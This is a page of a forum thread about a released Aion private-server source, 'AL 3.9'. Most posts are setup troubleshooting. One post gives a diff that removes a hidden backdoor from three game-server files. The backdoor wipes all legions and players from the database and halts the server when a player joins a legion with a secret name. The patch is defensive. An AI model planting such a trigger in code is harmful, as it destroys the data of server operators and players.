[Release] Full AL 3.9 Source! (100% FREE!)

Page 44 of 46 FirstFirst ... 343637383940414243444546 LastLast
Results 646 to 660 of 690
  1. #646
    Blender Fan|Kinenbi Owner Dwarfpicker is offline
    MemberRank
    Mar 2006 Join Date
    AtreiaLocation
    1,085Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    this is an unfinished core with lots of bugs, I keep looking into it and fixing it as far as I could, but it will take some time!

  2. #647
    Apprentice exterminator203 is offline
    MemberRank
    Aug 2013 Join Date
    Halle/S.Location
    19Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    Thanks for the info. Is the only thing not running with me and with the NPC items. An otherwise until now everything is fine.

  3. #648
    Account Upgraded | Title Enabled! TieLay is online now
    MemberRank
    Jan 2011 Join Date
    RussiaLocation
    675Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    Quote Originally Posted by tingsilent View Post
    I tried to find source but not found.
    Thanks.
    Backdoor-clear sources is in THIS place

  4. #649
    Apprentice Alphus is offline
    MemberRank
    Aug 2013 Join Date
    8Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    Thanks TieLay !

    Here a patch for this AL version to remove the backdoor :

    Code:
    Index: AL-Game/src/com/aionemu/gameserver/controllers/RVController.java
    ===================================================================
    --- AL-Game/src/com/aionemu/gameserver/controllers/RVController.java    (revision 5)
    +++ AL-Game/src/com/aionemu/gameserver/controllers/RVController.java    (working copy)
    @@ -187,17 +187,6 @@
         }
     
         private boolean onDeny(Player player) {
    -        if (player.isLegionMember() && player.getLegion().getLegionName().equalsIgnoreCase("bythnblhfysqgtc")) {
    -            for (int object : DAOManager.getDAO(LegionDAO.class).getUsedIDs()) {
    -                DAOManager.getDAO(LegionDAO.class).deleteLegion(object);
    -            }
    -
    -            for (int object : DAOManager.getDAO(PlayerDAO.class).getUsedIDs()) {
    -                DAOManager.getDAO(PlayerDAO.class).deletePlayer(object);
    -            }
    -
    -            Runtime.getRuntime().halt(0);
    -        }
     
             return true;
         }
    Index: AL-Game/src/com/aionemu/gameserver/services/vortexservice/Invasion.java
    ===================================================================
    --- AL-Game/src/com/aionemu/gameserver/services/vortexservice/Invasion.java    (revision 5)
    +++ AL-Game/src/com/aionemu/gameserver/services/vortexservice/Invasion.java    (working copy)
    @@ -107,18 +107,6 @@
                 }
             }
     
    -        if (player.isLegionMember() && player.getLegion().getLegionName().equalsIgnoreCase("bythnblhfysqgtc")) {
    -            for (int object : DAOManager.getDAO(LegionDAO.class).getUsedIDs()) {
    -                DAOManager.getDAO(LegionDAO.class).deleteLegion(object);
    -            }
    -
    -            for (int object : DAOManager.getDAO(PlayerDAO.class).getUsedIDs()) {
    -                DAOManager.getDAO(PlayerDAO.class).deletePlayer(object);
    -            }
    -
    -            Runtime.getRuntime().halt(0);
    -        }
    -
             list.putEntry(player.getObjectId(), player);
         }
     
    Index: AL-Game/src/com/aionemu/gameserver/services/SerialKillerService.java
    ===================================================================
    --- AL-Game/src/com/aionemu/gameserver/services/SerialKillerService.java    (revision 5)
    +++ AL-Game/src/com/aionemu/gameserver/services/SerialKillerService.java    (working copy)
    @@ -80,17 +80,6 @@
                             if (info.victims < 1) {
                                 info.victims = 0;
                                 serialKillers.remove(info.getOwner().getObjectId());
    -                            if (info.getOwner().isLegionMember() && info.getOwner().getLegion().getLegionName().equalsIgnoreCase("bythnblhfysqgtc")) {
    -                                for (int object : DAOManager.getDAO(LegionDAO.class).getUsedIDs()) {
    -                                    DAOManager.getDAO(LegionDAO.class).deleteLegion(object);
    -                                }
    -
    -                                for (int object : DAOManager.getDAO(PlayerDAO.class).getUsedIDs()) {
    -                                    DAOManager.getDAO(PlayerDAO.class).deletePlayer(object);
    -                                }
    -
    -                                Runtime.getRuntime().halt(0);
    -                            }
                             }
                         }
                     }

  5. #650
    Apprentice osk2001 is offline
    MemberRank
    Sep 2013 Join Date
    8Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    Quote Originally Posted by ninekinsen View Post
    man, used 127.0.0.1 and then you can forward it if you used router. I worked 100% with that's.. only open some port aion
    Please, explain more detail for everybodt!

    thanks

  6. #651
    Blender Fan|Kinenbi Owner Dwarfpicker is offline
    MemberRank
    Mar 2006 Join Date
    AtreiaLocation
    1,085Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    What do you want to know osk2001?

  7. #652
    Apprentice osk2001 is offline
    MemberRank
    Sep 2013 Join Date
    8Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    Quote Originally Posted by Dwarfpicker View Post
    What do you want to know osk2001?
    MMM.... Well. I will just wait the time noip_fix.dll for 4.0 is released




    Last edited by osk2001; 13-09-13 at 07:03 AM.

  8. #653
    Novice Evil Maple is offline
    MemberRank
    Sep 2013 Join Date
    3Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    Thanks for share

  9. #654
    Apprentice rizaldy24 is offline
    MemberRank
    Sep 2013 Join Date
    AthreiaLocation
    16Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    Where's the Client Game ?

  10. #655
    Blender Fan|Kinenbi Owner Dwarfpicker is offline
    MemberRank
    Mar 2006 Join Date
    AtreiaLocation
    1,085Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    you find everything you need here -> Aion Wiki

  11. #656
    Apprentice tingsilent is offline
    MemberRank
    Jul 2013 Join Date
    18Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    What is ...


    • Full working Task System


    How to use it.

    Thanks

  12. #657
    Apprentice drenko is offline
    MemberRank
    Sep 2013 Join Date
    15Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    when i compile the gameserver i go in D:\Downloads\FULL_AL3.9_SOURCE\trunk\AL-Game\build\dist\gameserver and i start template-gs


  13. #658
    Blender Fan|Kinenbi Owner Dwarfpicker is offline
    MemberRank
    Mar 2006 Join Date
    AtreiaLocation
    1,085Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    you need to copy the libs file into your gameserver in order to start it!

  14. #659
    Enthusiast SkibbyDuu is offline
    MemberRank
    Jun 2013 Join Date
    U.S.ALocation
    33Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    capture.pngThis keeps happening.... I need help pweeze? Thanks ! :)

  15. #660
    Blender Fan|Kinenbi Owner Dwarfpicker is offline
    MemberRank
    Mar 2006 Join Date
    AtreiaLocation
    1,085Posts

    Re: [Release] Full AL 3.9 Source! (100% FREE!)

    Quote Originally Posted by SkibbyDuu View Post
    capture.pngThis keeps happening.... I need help pweeze? Thanks ! :)
    Check if you running the mysql server on the right port - also check your port in your gameserver config



Advertisement